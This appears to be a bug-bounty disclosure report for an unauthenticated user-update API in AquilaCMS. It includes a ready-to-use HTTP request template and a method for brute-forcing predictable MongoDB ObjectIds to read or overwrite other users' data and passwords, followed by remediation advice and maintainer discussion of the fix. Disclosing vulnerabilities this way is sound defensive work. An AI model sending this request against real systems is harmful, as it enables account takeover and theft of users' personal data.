Incorrect Use of Privileged APIs in aquilacms/aquilacms
Reported on
Aug 1st 2021
✍️ Description
An unauthenticated API function allows anyone to view or change another user's first name, last name, password, and address information. The response also leaks that user's activateAccountToken and resetPassToken.
🕵️♂️ Proof of Concept
User accounts are identified by their MongoDB ObjectId, which is returned to the client during registration and is not a secret: an ObjectId is built from a timestamp, a per-process value, and an incrementing counter, so ids created by the same server are close to one another. Once the attacker holds one valid ObjectId, the linked mongo-objectid-predict tool can generate candidate ids for other users. Without being logged in, the attacker then sends the following API call and brute-forces the _id parameter with those candidates:
Variables: { IP }, { ID_TO_GUESS }
PUT /api/v2/user HTTP/1.1
Host: { IP }:3010
Content-Length: 245
Accept: application/json, text/plain, */*
lang: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://{IP}:3010
Referer: http://{IP}:3010/account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"delivery_address":1,"billing_address":0,"isActiveAccount":false,"_id":" { ID_TO_GUESS }","civility":1,"lastname":"whatever20","firstname":"whatever","email":"admin2@admin2.aaa","preferredLanguage":"en","fullname":"whatever whatever10"}
Response:
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Set-Cookie: cookie_notice=false; Path=/; Expires=Mon, 01 Nov 2021 22:16:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1037
ETag: W/"40d-F8j15BnKHmYafwqqrsJh8golXDg"
Date: Sun, 01 Aug 2021 22:16:11 GMT
Connection: close
{"code":"USER_UPDATE_SUCCESS",
...
....
💥 Impact
An attacker can obtain all stored information about any user, including names, addresses, and the password-reset and account-activation tokens, and can overwrite that information, including another user's password. Total account compromise is possible through this one API call.
🩹 Remediation
Do not expose the MongoDB ObjectId as the public identifier for user accounts; use a randomized 32-byte string or a UUID instead. More importantly, ensure that callers of this API are authenticated and that the record being read or updated is the caller's own, taken from the session rather than from the request body; random identifiers alone do not replace that authorization check.
📍 Location
users.js#L86
📝 References
https://github.com/andresriancho/mongo-objectid-predict
Great job on your disclosure!
As you can see, we have made contact with the maintainer via a GitHub Issue and are waiting to hear back from them (i.e. to create a SECURITY.md) so that we can share a magic link with them where they can validate or invalidate this disclosure.
Hey SmashSnacks, the maintainers got back to us by email, asking us to fill out a form. I've gone and done that for you, so we're just waiting for their response now. Good job!
@admin, now that this is validated, is it possible to submit for CVE?
Thanks for this "disclosure bounty". We'll fix this in the next few days.
@SmashSnacks - we are currently building out our automated CVE system. Once this is live, it will back-assign for all applicable vulnerabilities.
Yes! https://github.com/AquilaCMS/AquilaCMS/pull/164
But I cannot mark it as fixed (huntr bug).
@maintainer - could you please resolve the report by marking the report as fixed? You can do this by clicking Resolve below 👍
What is the issue you are seeing when trying to mark it as fixed?
Can you confirm which version has the patch been applied to? I can then help you mark the report as fixed 👍